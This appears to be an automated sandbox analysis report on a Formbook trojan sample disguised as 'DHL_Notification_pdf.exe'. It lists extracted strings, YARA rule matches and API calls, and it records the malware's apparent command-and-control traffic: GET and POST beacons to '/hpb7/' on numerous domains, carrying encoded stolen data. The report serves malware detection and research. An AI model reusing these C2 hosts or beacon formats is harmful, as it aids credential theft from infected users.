          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kotelak.ru
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kotelak.ru/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kotelak.ruReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kunimi.org
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kunimi.org/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kunimi.org/hpb7/I
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madliainsalu.com
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madliainsalu.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madliainsalu.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mindsetlighting.xyz
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mindsetlighting.xyzReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rifleroofers.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rifleroofers.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rifleroofers.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.traindic.top
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.traindic.top/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.yongleproducts.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.yongleproducts.com/hpb7/
          Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby
          Source: 146E771M.5.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 146E771M.5.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 146E771M.5.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 146E771M.5.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknown | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.kunimi.org | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.kunimi.org | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kunimi.org/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
          Source: unknown | DNS traffic detected: queries for: www.yongleproducts.com
          Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.0dhy.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1 | Host: www.kunimi.org | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.traindic.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1 | Host: www.bohndigitaltech.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.rifleroofers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1 | Host: www.denko-kosan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: initial sample | Static PE information: Filename: DHL_Notification_pdf.exe
          Source: DHL_Notification_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_00410371
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00405843
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401801
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401803
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401810
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_004038C3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_004228C4
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_004230E8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_004038B9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0042219B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401A65
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00422211
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00421A8C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401BA0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_004223BA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401CA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00401CB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0040561A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00420623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00405623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00422EAB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0040BFEE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0040BFF3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00421F81
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE20A8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2B090
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE28EC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AEE824
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AD1002
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A1F900
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE22AE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4EBB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ADDBD2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE2B28
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2841F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ADD466
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE25DD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A10D20
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE2D07
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE1D55
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE2EF7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A36E30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ADD616
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE1FF1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AEDFCE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: String function: 00A1B150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: String function: 004019C0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E533 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E5E3 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E663 NtClose,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E713 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E52E NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0041E5DD NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A59A20 NtResumeThread,LdrInitializeThunk,
